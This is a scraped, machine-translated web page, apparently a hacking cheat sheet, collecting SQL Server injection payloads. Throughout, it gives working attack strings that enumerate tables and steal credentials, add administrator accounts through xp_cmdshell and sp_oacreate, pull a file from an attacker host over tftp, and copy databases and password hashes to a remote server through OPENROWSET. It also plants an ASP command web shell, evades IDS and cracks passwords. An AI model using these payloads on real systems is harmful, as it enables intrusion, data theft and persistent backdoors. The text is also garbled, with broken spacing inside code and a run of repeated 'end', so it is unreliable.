SQL injection summary (1)

xiaoxiao2021-03-06 36

Author: Years Union

Pig Sql injection summary (from the early 'or'1' = '1) The most important table name: select * from sysobjectssysobjects ncsysobjectssysindexes tsysindexessyscolumnssystypessysuserssysdatabasessysxloginssysprocesses the most important ones the user name (default is there sql database) publicdboguest (general prohibition, or no authority) db_sercurityadminab_dlladmin some default extension xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring xp_regwritexp_availablemedia drive related xp_dirtree directory xp_enumdsn ODBC connection xp_loginconfig server security mode information xp_makecab create compressed volume xp_ntsec_enumdomains domain information xp_terminate_process terminal process, given a PID example: sp_addextendedproc 'xp_webserver', 'c: /temp/xp_foo.dll'exec xp_webserversp_dropextendedproc' xp_webserver'bcp "select * FROM test..foo" queryout c: /inetpub/wwwroot/runcommand.asp -c -Slocalhost -Usa -Pfoobar 'group by users.id Having 1 = 1- 'Group by users.id, users.username, users.password, users.privs having 1 = 1-'; Insert Into Users Values (666, 'Attacker', 'FooBar', 0xfff) - Union Select TOP 1 Column_name from Information_schema.columns Where Table_name = 'Logintable'-union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME =' logintable 'where COLUMN_NAME NOT IN (' login_id ') - union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME =' logintable 'where COLUMN_NAME NOT IN ( 'login_id', 'login_name') - union select TOP 1 login_name FROM logintable-union select TOP 1 password FROM logintable where login_name = 'Rahul' - construction statement: query whether there xp_cmdshell 'union select @@ version, 1,1, 1 - and 1 = (Select @@ version) and 'sa' =

(select system_user) 'Union Select Ret, 1, 1, 1 from foo -' union select min (username), 1, 1, one from username> 'a'-' union select min (username), 1, 1, 1 from users where username> 'admin'-' union select password, 1, 1, 1 from users where user_name () = 'dbo'and 0 <> (Select User_Name () - Declare @Shell int exec sp_oacreate 'wscript.shell', @ shell output exec sp_oAmethod @ shell, 'run', null, 'c: /winnt/system32/cmd.exe / c net user swap 5245886 / add'and 1 = (select count (*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell'); EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll' 1 = (% 20select% 20count (* )% 20FROM% 20master.dbo.sysObjects% 20where% 20 type = 'x'% 20and% 20name = 'xp_cmdshell') and 1 = (select is_srvrolemember ('sysadmin')) Judging whether SA authority is AND 0 <> (SELECT TOP 1 Paths from newtable) - Branches Dafa and 1 = (select name from master.dbo.sysdatabases where dbid = 7) Get library name (from 1 to 5 is the iD of the system, 6 or more can be judged) Create a virtual directory E disk: Declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oametho D @o, 'Run', NULL, 'CScript.exe C: /inetpub/wwwroot/mkwebdir.vbs -w "Default Web Site" -V "E", "E: /"' Access Properties: (Match Write A WebShell) Declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null, 'cscript.exe c: /inetpub/wwroot/chaccess.vbs -a w3svc / 1 / root / e browse 'and 0 <> (Select Count (*) from master.dbo.sysdatabasees where name> 1 and dbid =

6) Submit DBID = 7, 8, 9 .... Get more database name and 0 <> (Select Top 1 Name from bbs.dbo.sysObjects where xtype = 'u') Vacuum is assumed to be admin AND 0 <> (Select Top 1 Name from bbs.dbo.sysObjects where xtype = 'u' and name not in ('admin')) is available. And 0 <> (Select Count (*) from bbs.dbo.sysobjects where xtype = 'u' and name = 'admin' and uid> (STR (ID))) Value Value Value assumes 18779569 UID = IDAND 0 <> (Select Top 1 Name from bbs.dbo.syscolumns where id = 18779569) Get a field of Admin, assume User_idand 0 <> (SELECT TOP 1 Name from bbs.dbo.syscolumns where id = 18779569 and name not in ('id', ...)) to fade other fields and 0 <(Select user_id from bbs bbs.dbo.admin where username> 1) You can get a password in order. . . . .

Assume that the presence of user_id usrname, password and other fields show.asp? Id = -1 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * from AdminShow.asp? ID = -1 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, *, 9, 10, 11, 12, 13 from admin (union statement is popular, Access is also special skills with branches ::% 5c = '/' or put / and / modify% 5 Submit an AND 0 <> (Select Count (*) from master.dbo.sdatabases where name> 1 and dbid = 6) And 0 <> (SELECT TOP 1 Name from bbs.dbo.sysObjects where xtype = 'u') Get a table name and 0 <> (select top 1 name from bbs.dbo.sysobjects where xtype = 'u' and name not in ('address')) and 0 <> (Select Count (*) from bbs.dbo.sysobjects where xtype = 'u' and name = 'admin' and uid> (STR (ID))) Judgment ID value and 0 <> (SELECT TOP 1 Name from BBS .dbo.syscolumns where id = 773577794) All field http: //xx.xx.xx.xx/111.asp? id = 3400; Create Table [dbo]. [swap] ([swappass] [char] (255) ); - http: //xx.xx.xx.xx/111.asp? id = 3400 and (select top 1 swappass from swap) = 1; Create Table newTable (ID ID IDETENTITY (1, 1), Paths Varchar (500)) Declare @Test varchar (20) EXEC MASTER.. pP_REGREAD @ rootkey = 'hkey_local_machine', @ Key = 'System / CurrentControlset / Services / W3SVC / Parameters / Virtual Roots / ', @Value_name =' / ', VALUES = @ Test Output Insert INTO PATHS (PATH) VALUES (@test) http://61.131.96.39/pageshow.asp?tianName= Policy and Regulations & Infoid = {57C4165A-4206-4C0D-A8D2-E70666EE4E08}; use% 20master; declare% 20 @ s% 20% 20INT; EXEC% 20sp_oAcreate% 20 "wscript.shell", @ s% 20OUT; EXEC% 20sp_oamethod% 20 @ s "run", null, "cmd.exe% 20 / c% 20PING% 201.1.1.1"; - Get the web path D: / XXXX, next: http: //xx.xx.xx.xx/111 .asp? id = 3400; USE KU1; - http: //xx.xx.xx.xx/111.asp? id = 3400;

Create Table CMD (STR Image); - Traditional XP_Cmdshell test procedure:; exec master "; exec master.dbo.sp_addlogin Hax; -; Exec Master.dbo.sp_password Null, Hax, Hax ; -; EXEC MASTER.DBO.SP_ADDSRVROLEMEMBER HAX SYSADMIN; -; exec master.dbo.xp_cmdshell 'net user Hax 5258 / Workstations: * / Times: All / Passwordchg: Yes / PasswordReq: Yes / Active: Yes / Add' ; -; exec master.dbo.xp_cmdshell 'net localgroup administrators hax / add'; - exec master..xp_servicecontrol 'start', 'schedule' exec master..xp_servicecontrol 'start', 'server'http: // www .xxx.com / list.asp? classid = 1; declare @Shell int exec sp_oacreate 'wscript.shell', @ shell output exec sp_oamethod @ shell, 'Run', NULL, 'C: /WINNT/SYSTEM32/Cmd.exe / c net user swap 5258 / add '; declare @Shell int exec sp_oacreate' wscript.shell ', @ shell output exec sp_oamethod @ shell,' run ', null,' c: /winnt/system32/cmd.exe / c net Localgroup administrators swap / add 'http://localhost/show.asp? id = 1'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-declare @a sysnam E set @ a = 'xp _' 'cmdshell' exec @a 'DIR C: /' DECLARE @a sysname set @ a = 'xp' '_ cm' 'dshell' exec @a 'DIR C: /'; Declare @A; set @ a = db_name (); Backup Database @a to disk = 'Your IP Your shared directory bak.dat' If it is limited, you can.

Select * from OpenRowSet ('SQLOLEDB', 'Server'; 'Sa'; '', 'SELECT' '' '' EXEC MASTER.DBO.SP_ADDLOGIN HAX ') Traditional Query Construction: SELECT * from news where id = .. And Topic = ... and ..... Admin 'And (*) from [user] where username =' Victim 'And Right (Left (UserPass, 01), 1) =' 1 ' ) and userpass <> 'SELECT 123; -; use master; -: a' or name like 'fff%'; - Show with a user named FFFF. 'and 1 <> (user]); -; Update [users] set email = (Select Top 1 Name from sysobjects where xtype =' u 'and status> 0) Where name =' FFFF '; - Description: The above statement is to get the first user table in the database and put the table name in the mailbox field of the FFFF user.

By viewing the user information of FFFF, you can get the first table called AD and get the idffff 'of this table according to the table name Ad, Update [users] set email = (Select Top 1 id from sysobjects where xtype =' u 'and name = 'ad') Where name = 'fff'; - I can get the name of the second table in the next table, fff '; Update [users] set email = (Select Top 1 Name from sysobjects where xtype =' u 'and) ID> 581577110) WHERE Name = 'fff'; - fff '; Update [users] set email = (select top 1 count (id) from password) where name =' fff '; - fff'; Update [Users] Set email = (select top 1 pwd from password where id = 2) Where name = 'fff'; - fff '; Update [users] set email = (select top 1 name from password where id = 2) where name =' ffff '; - exec master..xp_servicecontrol' start ',' schedule 'exec master..xp_servicecontrol' start ',' server'sp_addextendedproc 'xp_webserver', 'c: /temp/xp_foo.dll' can be extended by a general storage Method call: EXEC XP_WEBSERVER Once this extension store is executed, it can be removed: sp_dropextendedProc 'xp_webserver' Insert Into Users Values (666, char (0x63) char (0x68) CHAR (0x72) char (0x69) char (0x73), char (0x63) char (0x68) char (0x72) CHAR (0x69) CHAR (0x73), 0xfff) - Insert Into Users Values (667, 123, 123, 0xfff) - INSERT INTO Users Values (123, 'Admin' '-', 'Password', 0xFFFF) -; And User> 0 ;; And (Select Count (*) from sysobjects> 0; And (Select Count (*) from mySysObjects> 0 // for Access database -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------- Some of usually injected: a) ID = 49 The parameters of this type of injected are digital type, the SQL statement is roughly as follows : SELECT * FROM Table Name Where field = 49 The parameter of the injected is id = 49 and [Query Condition], that is, the generated statement: SELECT * FROM table name Where field = 49 and [query condition] (b) class =

The parameters such as the continuous drama are characters, and the SQL statement is generally approveled: select * from the name of the WHERE field = series' injection parameter is class = series' and "query criteria] and '' = ', that is, generated Statement: SELECT * FROM table name Where field = 'series of series' and' = '' (c) No filtered parameters, such as keyword = keyword, SQL statement is as follows: SELECT * FROM table Name WHERE Field Like '% Keyword%' Injection Parameters is Keyword = 'AND [Query Condition] and'% 25 '=', that is, the generating statement: SELECT * FROM table name Where Field Like '%' and [Query Conditions ] and '%' = '%' ;; and (select top 1 name from sysobjects where xtype = 'u' and status> 0)> 0SysObjects is the system table of SQL Server, stores all the table names, views, constraints, and others. Object, Xtype = 'u' and status> 0, indicating the table name established by the user, the above statement removes the first table name, smaller than 0, so that the error information exposes the table name. ; And (select top 1 col_name (Object_ID ('Name')> 0 After getting the table name from 5, use Object_ID ('Name') to get the internal ID, col_name ("COL_NAME) Table name ID, 1) Represents the first field name of the table, replace it with 2, 3, 4 ... You can get the field name inside the specified sheet one by one. POST.HTM content: It is mainly convenient to enter. </ iframe> <br> <form action = http: //test.com/count.asp target = p> <input name = "ID "value =" 1552; Update aaa set aaa = (select top 1 name from sysobjects where xtype = 'u' and status> 0); - "Style =" Width: 750> <input type = submit value = ">>> >>> <input type = hidden name = fno value = "2, 3"> </ form> enumerating his data table name: ID = 1552; Update AAA SET AAA = (Select Top 1 Name from sysobjects where Xtype = 'u' and status> 0); - This is to update the first table name to the field of AAA.</p> <p>Read the first table, the second table can be read out (adding the table name "just obtained after the condition). ID = 1552; Update aaa set aaa = (Select Top 1 Name from sysobjects where xtype = 'u' and status> 0 and name <> 'vote'); - then id = 1552 and exists (SELECT * AAA WHERE AAA > 5) Read the second table, ^^^^^^^^^^^^^^^</p> <p>Reading field is this: ID = 1552; Update aaa set aaa = (select top 1 col_name (Object_ID ('Name'), 1)); - then id = 1552 and exists (SELECT * from Aaa Where AAA> 5) Error, get the field name id = 1552; Update aaa set aaa = (object_id ('table name), 2)); - then id = 1552 and exists (SELECT * from AAA WHERE AAA> 5) Error, get the name of the field ------------------------------ Advanced Tips: [Get Data Name] [Segment Value Update to the table name, then you can get the table name] Update table name SESOBJECTS WHERE Xtype = u and status> 0 [and name <> "you get Name 'Identified One Add]) [WHER Condition] SELECT TOP 1 Name from sysobjects where xtype = u and status> 0 and name not in (' table1 ',' Table2 ', ...) Involved Database Administrator Account and system administrator account [Current account must be sysadmin group] [Get Data Table Field Name] [Update the field value as a field name, then you can get the value of this field "Update table name SET field = (Select Top 1 Col_Name (Object_ID ('To query the data table name'), the field list,: 1) [WHERE condition] bypass the IDS detection [Use variable] Declare @a sysname set @ a = 'XP _' ' Cmdshell 'exec @a' Dir C: / 'declare @a sysname set @ a =' xp ' ' _ cm ' ' dshell 'exec @a' DIR C: / '1, open remote database Basic syntax Select * from OpenrowSet ('SQLOLEDB', 'Server = ServerName; UID = SA; PWD = APACHY_123', 'SELECT * from Table1') Parameters: (1) OLEDB Provider Name2, where the connection string parameter can be any and port to be used, such as select * from openrowset ('sqloledb', 'uid = sa; pwd = apachy_123; network = dbms Socn; address = 202.100.100.1, 1433;' , 'select * from table' To copy the entire database of the target host, first set up a connection on the target host and the database on your own machine (how to establish a remote connection on the target host, just have already talked), after the INSERT all telecommunications Go to the local table.</p> <p>Basic syntax: INSERT INTO OPENROWSET ('sqloledb', 'server = servername; uid = sa; pwd = apachy_123', 'select * from table1') Select * from table2 This row statement copy all data in Table2 table on Table2 table on the target host Go to the Table1 table in the remote database. The actual use of the IP address and port of the connection string are appropriately modified, pointing to where you need, such as Insert Into OpenRowSet ('sqloledb', 'UID = SA; PWD = apachy_123; network = dbmssocn; address = 202.100.100.1, 1433; ',' select * from table1 ') select * from table2 insert into OPENROWSET (' SQLOLEDB ',' uid = sa; pwd = hack3r; Network = DBMSSOCN; Address = 202.100.100.1,1433; ',' select * from _sysdatabases' ) select * from master.dbo.sysdatabases insert into OPENROWSET ( 'SQLOLEDB', 'uid = sa; pwd = hack3r; Network = DBMSSOCN; Address = 202.100.100.1,1433;', 'select * from _sysobjects') select * from user_database.dbo.sysobjects insert into OPENROWSET ( 'SQLOLEDB', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1,1433;', 'select * from _syscolumns') select * from user_database.dbo. After syscolumns, you can see the library structure of the target host from the local database, which is easy to make a confused, not much, copy the database: INSERT INTO OPENROWSET ('sqloledb', 'uid = sa; pwd = apachy_123; network = dbmssocn; address = 202.100.100.1, 1433; ',' Select * from table1 ') Select * from database..table1 INSERT INTO OPENROWSET (' sqloledb ',' uid = sa; pwd = apachy_123; network = dbmssocn; address = 202.100. 100.1, 1433; ',' Select * from table2 ') Select * from database..table2 ... 3, complex 4, Haxi table (HASH) This is actually the above complex 5, an extension of the database application. The login password is stored in sysxlogins.</p> <p>As follows: insert into OPENROWSET ( 'SQLOLEDB', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1,1433;', 'select * from _sysxlogins') select * from database.dbo.sysxlogins give After Hash, 6 can make violent cracks. This requires a little luck and a lot of time.</p> <p>Ways to traverse catalog: Create a temporary table: Temp'5; Create Table Temp (ID NVARCHAR (255), Num2 NVARCHAR (255), Num3 NVARCHAR (255)); - 5 '; Insert Temp Exec Master.dbo.xp_availablemedia; - Get all current drive 5 '; Insert Into Temp (ID) exec master.dbo.xp_subdirs' c: / '; - Loose subdirectories list 5'; Insert INTO TEMP (ID, Num1) exec master.dbo.xp_dirtree 'c: /'; - Get all subdirectories of the directory tree structure, inch into the TEMP table 5 '; INSERT INTO TEMP (ID) exec master.dbo.xp_cmdshell' Type C: /Web/index.asp'; - View content 5 '; Insert INTO TEMP (ID) Exec Master.dbo.xp_cmdshell' DIR C: / '; - 5'; Insert Into Temp (ID) EXEC MASTER.DBO.XP_CMDSHELL 'DIR C: / * .ASP / S / A'; - 5 '; INSERT INTO TEMP (ID) EXEC MASTER.DBO.XP_CMDSHEC' CScript C: /inetpub/adminscripts/adsutil.vbs Enum W3SVC '5'; INSERT INTO TEMP (ID, NUM1) EXEC MASTER.DBO.XP_DIRTREE 'C: /'; - (XP_Dirtree Application Public) Write Table: Statement 1: http://www.xxxxx.com/down /List.asp?id=1 and 1 = (select is_srvrolemember ('sysadmin')); - Statement 2: http://www.xxxxx.com/down/list.asp? id = 1 and 1 = (SELECT IS_SRVROLEMEMBER ('ServerAdmin')); - Statement 3: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (Select is_srvrolemember ('setupadmin')); - statement 4: http://www.xxxx.com/down/list.asp? id = 1 and 1 = (select is_srvrolemember ('securityadmin')); - statement 5: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (SELECT IS_SRVROLEMEMBER ('securityAdmin')); - Statement 6: http://www.xxxxx.com/down /List.asp?id=1 and 1 = (select is_srvrolemember ('diskdmin')); - Statement 7: http://www.xxxxx.com/down/list.asp? id = 1 and 1 = (SELECT IS_SRVROLEMEMBER ('bulkadmin')); - Statement 8:</p> <p>Http://www.xxxxx.com/down/list.asp?id=1 and 1 = (select is_srvrolemember ('bulkadmin')); - Statement 9: http://www.xxxxx.com/down/list .asp? id = 1 and 1 = (select is_member ('db_owner')); - Write the path to the table: http://www.xxxxx.com/down/list.asp? id = 1; CREATE Table DIRS (Paths Varchar (100), ID INT) - http: // http://www.xxxxx.com/down/list.asp? id = 1; Insert Dirs Exec Master.dbo.xp_dirtree 'C: /' - http:// http://www.xxxxx.com/down/list.asp? id = 1 and 0 <> (Select Top 1 Paths from DIRS) - http: // http://www.xxxxx.com /down/list.asp?id=1 and 0 <> (SELECT TOP 1 Paths from Dirs where paths not in ('@ @Etpub')) - statement: http:// http://www.xxxxx.com/down /List.asp?id=1; Create Table Dirs1 (Paths Varchar (100), ID INT) - Statement: http:// http://www.xxxxx.com/down/list.asp? id = 1; INSERT DIRS EXEC MASTER.DBO.XP_DIRTREE 'E: / Web' - Statement: http:// http://www.xxxxx.com/down/list.asp? id = 1 and 0 <> (SELECT TOP 1 PATHS From DIRS1) - Back up the database to web directory: download http: // http://www.xxxxx.com/down/list.asp? id = 1; declare @a sysname; set @ a = db_name (); backup Database @a to disk = 'E: / Web / Down .bak '; - and% 201 = (select% 20top% 201% 20Name% 20FROM (SELECT% 20top% 2012% 20ID, Name% 20WHERE% 20SysObjects% 20where% 20XTYPE = CHAR (85))% 20T% 20ORDER% 20by % 20ID% 20Desc) and% 201 = (select% 20top% 201% 20COL_NAME (Object_ID ('user_login'), 1)% 20FROM% 20SysObjects See related tables.</p> <p>AND 1 = (select% 20User_ID% 20FROM% 20User_login) and% 200 = (select% 20User% 20FROM% 20User_login% 20where% 20User> 1) ......................................................................... ... - wscript.shell example declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' It could be run in our sample scenario by specifying the following UserName: '; declare @o int exec sp_oacreate' wscript.shell ', @o out exec sp_oamethod @o,' run ', null,' notepad.exe '- 2) This Example Uses the 'scripting.filesystemobject' object to read a known text file: - scripting.filesystemobject example - read a known file declare @o int, @f int, @t int, @ret int declare @line varchar (8000) exec sp_oacreate 'scripting.filesystemObject', @o out exec sp_oamethod @o, 'opentextfile', @f out, 'c: /boot.ini', 1 exec @ret = sp_oamethod @f, 'readline', @line out while (@ RET = 0) Begin Print @line Exec @ret = sp_oamethod @f, 'readline', @line out end end end end end end end end end end end end end end end end end end end end end end end end end end end end end end end end end end end end end) This Example Creates an ASP Script That Will Run ANY Comma nd passed to it in the querystring: - scripting.filesystemobject example - create a 'run this' .asp file declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o Out Exec sp_oamethod @o, 'createtetextfile', @f out, 'c: /inetpub/wwroot/foo.asp', 1 exec @ret = sp_oamethod @f, 'writeline', null, '<% set o = server. CreateObject ("wscript.shell": o.run (Request.QueryString ("cmd"))%> '</p> <p>It is important to note that when running on a Windows NT4, IIS4 platform, commands issued by this ASP script will run as the 'system' account. In IIS5, however, they will run as the low-privileged IWAM_xxx account. 4) This (somewhat spurious) example illustrates the flexibility of the technique; it uses the 'speech.voicetext' object, causing the SQL Server to speak: Page 16declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec SP_OAMETHOD @o, 'register', null, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', null, 'all your sequel servers are Belong to, US', 528 waitfor delay '00: 00: 05 'This could of course be run in our example scenario, by specifying the following' username '(note that the example is not only injecting a script, but simultaneously logging in to the application as' admin '): Username: admin'; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', null, 'foo', 'Bar' Exec S P_oasetproperty @o, 'speted', 150 Exec sp_oamethod @o, 'speak', null, 'all Your Sequel Servers Are Belong to US, 528 Waitfor DELAY '00: 00: 05 - Common password and related statement: Password sqlserver sql admin sesame sa guest Here is the script: (sqlcrack.sql) create table tempdb..passwords (pwd varchar (255)) bulk insert tempdb..passwords from 'c: /temp/passwords.txt' select name, pwd From tempdb..passwords inner join sysxlogins on (pwdcompare (pwd, sysxlogins.password, 0) =</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-53131.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="53131" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.041</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'gulOI2Chk8qnI5uyg3lUVhF3CZWM8UnuyFrDlkwG3rVCjgM8r7t_2FAFb6nqdFV_2BgzgbyQlmbCsiwe9XSi3QUINA_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>